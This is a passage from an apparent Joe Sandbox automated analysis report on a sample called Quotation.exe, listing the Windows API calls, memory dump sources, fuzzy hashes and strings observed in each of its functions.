Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15

Function 6FF82D14 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?), ref: 6FF82DD3

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
Instruction ID: d93e78494e09aa6ec4d7f3fdec31074403eedaf14b92a7a433c4b641b89fd750
Opcode Fuzzy Hash: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
Instruction Fuzzy Hash: C741A0769007059FDF009F68DA81BA93BB4EF07338F24422AE535CF3A0D735A4A18B94

Function 004069E9 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4

Function 00406926 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4

Function 6FF81A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6FF8501C,00000004,00000040,6FF85034), ref: 6FF81A68

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
Instruction ID: f0236cd0b057474380caad8b95ea0e69724d72aa2d1926dc757d1853453af039
Opcode Fuzzy Hash: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
Instruction Fuzzy Hash: 20F092B4979B42DBCF198F2C94447293FB0B71B374B08452EF27A9A360C3304121AB9E

Function 004062B6 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718

Function 004054C6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C

Function 004054E1 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D

Non-executed Functions

Function 6FF82351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FF8294E
lstrcpyW.KERNEL32(00000008,?), ref: 6FF829A4
lstrcpyW.KERNEL32(00000808,?), ref: 6FF829AF
GlobalFree.KERNEL32(00000000), ref: 6FF829C0
GlobalFree.KERNEL32(?), ref: 6FF82A44
GlobalFree.KERNEL32(?), ref: 6FF82A4A
GlobalFree.KERNEL32(?), ref: 6FF82A50
GetModuleHandleW.KERNEL32(00000008), ref: 6FF82B1A
LoadLibraryW.KERNEL32(00000008), ref: 6FF82B2B
GetProcAddress.KERNEL32(?,?), ref: 6FF82B82
lstrlenW.KERNEL32(00000808), ref: 6FF82B9D

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
Instruction ID: 14d75f44c2bf112e64bfb1557c7cfcdfab37adebc0f739b83f76f6013975dfe7
Opcode Fuzzy Hash: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
Instruction Fuzzy Hash: FC429072A487029FD718CF3889547AAB7F0FF89714F004A2EE5B9D6290E771F5448B92

Function 004062E4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
wsprintfA.USER32 ref: 00406363
GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
GlobalFree.KERNEL32(00000000), ref: 0040640D
CloseHandle.KERNEL32(00000000), ref: 00406414

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Strings

[Rename], xrefs: 004063C3, 004063D2
%ls=%ls, xrefs: 00406359

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C

Function 6FF82209 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302

GlobalFree.KERNEL32(00000000), ref: 6FF822F1
GlobalFree.KERNEL32(00000000), ref: 6FF82326

Strings

s<u, xrefs: 6FF822D0

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc
String ID: s<u
API String ID: 1780285237-779365171
Opcode ID: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
Instruction ID: 63cc8096b8e2e04cd55d6496d8c0e8f0a395b888bd882e68a68dd1d82578f38f
Opcode Fuzzy Hash: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
Instruction Fuzzy Hash: F531E232114601EBEB258F68C958FBBB7B8FF47325B000269F431D62A0DB72A460DB61

Function 00406D1B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

Strings

*?|<>/":, xrefs: 00406D7F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-776222514
Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9

Function 00405739 Relevance: 12.1, APIs: 8, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405756
GetSysColor.USER32 ref: 0040578F
SetTextColor.GDI32(?), ref: 004057A2
SetBkMode.GDI32(?,?), ref: 004057AE
GetSysColor.USER32(?), ref: 004057C2
SetBkColor.GDI32(?,?), ref: 004057D8
DeleteObject.GDI32(?), ref: 004057F4
CreateBrushIndirect.GDI32(?), ref: 004057FE

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
